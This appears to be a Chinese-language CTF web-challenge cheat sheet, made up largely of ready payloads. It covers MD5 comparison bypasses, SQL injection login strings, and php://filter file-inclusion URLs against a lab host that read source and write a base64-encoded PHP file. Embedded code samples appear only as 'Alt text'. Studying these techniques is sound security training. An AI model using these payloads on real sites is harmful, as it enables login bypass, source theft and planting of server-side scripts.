php 备份文件:

1.index.php.bak 2.index.php~ 3.index.php.swp

md5 比较

弱比较:

md5 弱比较,为 0e 开头的会被识别为科学记数法,结果均为 0

代码:

Alt text

Payload:

param1=QNKCDZO&param2=aabg7XSs

强比较 :

md5 强比较,此时如果传入的两个参数不是字符串,而是数组,md5()函数无法解出其数值,而且不会报错,就会得到===强比较的值相等

代码:

Alt text

Payload:

param1[]=111&param2[]=222

SQL 注入万能密码

用户名:admin’ or 1=1– - 密码任意 用户名:admin ‘# 密码任意

文件包含

常见格式:

http://119.23.73.3:5001/web8/index.php?file=flag.php

php 伪协议读源码

http://119.23.73.3:5001/web8/index.php? file=php://filter/read=convert.base64-encode/resource=flag.php

利用 php 伪协议来写入文件

file=php://filter/write=convert.base64-decode/resource=./tmp.php&c=aPD9waHAgZWNobyhmaWxlX2dldF9jb250ZW50cygiZmxhZy5waHAiKSk7Pz4=